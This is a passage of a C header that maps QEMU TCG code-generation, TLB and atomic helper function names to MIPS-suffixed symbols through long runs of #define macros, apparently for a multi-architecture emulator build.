tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips #define tcg_gen_exit_tb tcg_gen_exit_tb_mips #define tcg_gen_goto_tb tcg_gen_goto_tb_mips #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips #define check_exit_request check_exit_request_mips #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips #define simd_desc simd_desc_mips #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips #define tcg_gen_gvec_4 tcg_gen_gvec_4_mips #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mips #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips #define tcg_gen_gvec_not tcg_gen_gvec_not_mips #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips #define tcg_gen_gvec_add tcg_gen_gvec_add_mips #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips #define tcg_gen_gvec_and tcg_gen_gvec_and_mips #define tcg_gen_gvec_or tcg_gen_gvec_or_mips #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mips #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips #define vec_gen_2 vec_gen_2_mips #define vec_gen_3 vec_gen_3_mips #define vec_gen_4 vec_gen_4_mips #define tcg_gen_mov_vec tcg_gen_mov_vec_mips #define tcg_const_zeros_vec tcg_const_zeros_vec_mips #define tcg_const_ones_vec tcg_const_ones_vec_mips #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips #define tcg_gen_ld_vec tcg_gen_ld_vec_mips #define tcg_gen_st_vec tcg_gen_st_vec_mips #define tcg_gen_stl_vec tcg_gen_stl_vec_mips #define tcg_gen_and_vec tcg_gen_and_vec_mips #define tcg_gen_or_vec tcg_gen_or_vec_mips #define tcg_gen_xor_vec tcg_gen_xor_vec_mips #define tcg_gen_andc_vec tcg_gen_andc_vec_mips #define tcg_gen_orc_vec tcg_gen_orc_vec_mips #define tcg_gen_nand_vec tcg_gen_nand_vec_mips #define tcg_gen_nor_vec tcg_gen_nor_vec_mips #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips #define tcg_gen_not_vec tcg_gen_not_vec_mips #define tcg_gen_neg_vec tcg_gen_neg_vec_mips #define tcg_gen_abs_vec tcg_gen_abs_vec_mips #define tcg_gen_shli_vec tcg_gen_shli_vec_mips #define tcg_gen_shri_vec tcg_gen_shri_vec_mips #define tcg_gen_sari_vec tcg_gen_sari_vec_mips #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips #define tcg_gen_add_vec tcg_gen_add_vec_mips #define tcg_gen_sub_vec tcg_gen_sub_vec_mips #define tcg_gen_mul_vec tcg_gen_mul_vec_mips #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips #define tcg_gen_smin_vec tcg_gen_smin_vec_mips #define tcg_gen_umin_vec tcg_gen_umin_vec_mips #define tcg_gen_smax_vec tcg_gen_smax_vec_mips #define tcg_gen_umax_vec tcg_gen_umax_vec_mips #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips #define tcg_gen_shls_vec tcg_gen_shls_vec_mips #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips #define tcg_gen_sars_vec tcg_gen_sars_vec_mips #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips #define tb_htable_lookup tb_htable_lookup_mips #define tb_set_jmp_target tb_set_jmp_target_mips #define cpu_exec cpu_exec_mips #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips #define cpu_reloading_memory_map cpu_reloading_memory_map_mips #define cpu_loop_exit cpu_loop_exit_mips #define cpu_loop_exit_restore cpu_loop_exit_restore_mips #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips #define tlb_init tlb_init_mips #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips #define tlb_flush tlb_flush_mips #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips #define tlb_flush_all_cpus tlb_flush_all_cpus_mips #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mips #define tlb_flush_page tlb_flush_page_mips #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips #define tlb_protect_code tlb_protect_code_mips #define tlb_unprotect_code tlb_unprotect_code_mips #define tlb_reset_dirty tlb_reset_dirty_mips #define tlb_set_dirty tlb_set_dirty_mips #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips #define tlb_set_page tlb_set_page_mips #define get_page_addr_code_hostp get_page_addr_code_hostp_mips #define get_page_addr_code get_page_addr_code_mips #define probe_access probe_access_mips #define tlb_vaddr_to_host tlb_vaddr_to_host_mips #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips #define helper_le_lduw_mmu helper_le_lduw_mmu_mips #define helper_be_lduw_mmu helper_be_lduw_mmu_mips #define helper_le_ldul_mmu helper_le_ldul_mmu_mips #define helper_be_ldul_mmu helper_be_ldul_mmu_mips #define helper_le_ldq_mmu helper_le_ldq_mmu_mips #define helper_be_ldq_mmu helper_be_ldq_mmu_mips #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips #define cpu_ldub_data_ra cpu_ldub_data_ra_mips #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips #define cpu_lduw_data_ra cpu_lduw_data_ra_mips #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips #define cpu_ldl_data_ra cpu_ldl_data_ra_mips #define cpu_ldq_data_ra cpu_ldq_data_ra_mips #define cpu_ldub_data cpu_ldub_data_mips #define cpu_ldsb_data cpu_ldsb_data_mips #define cpu_lduw_data cpu_lduw_data_mips #define cpu_ldsw_data cpu_ldsw_data_mips #define cpu_ldl_data cpu_ldl_data_mips #define cpu_ldq_data cpu_ldq_data_mips #define helper_ret_stb_mmu helper_ret_stb_mmu_mips #define helper_le_stw_mmu helper_le_stw_mmu_mips #define helper_be_stw_mmu helper_be_stw_mmu_mips #define helper_le_stl_mmu helper_le_stl_mmu_mips #define helper_be_stl_mmu helper_be_stl_mmu_mips #define helper_le_stq_mmu helper_le_stq_mmu_mips #define helper_be_stq_mmu helper_be_stq_mmu_mips #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips #define cpu_stb_data_ra cpu_stb_data_ra_mips #define cpu_stw_data_ra cpu_stw_data_ra_mips #define cpu_stl_data_ra cpu_stl_data_ra_mips #define cpu_stq_data_ra cpu_stq_data_ra_mips #define cpu_stb_data cpu_stb_data_mips #define cpu_stw_data cpu_stw_data_mips #define cpu_stl_data cpu_stl_data_mips #define cpu_stq_data cpu_stq_data_mips #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mips #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mips #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mips #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips #define helper_atomic_xchgb helper_atomic_xchgb_mips #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mips #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips #define helper_atomic_or_fetchb 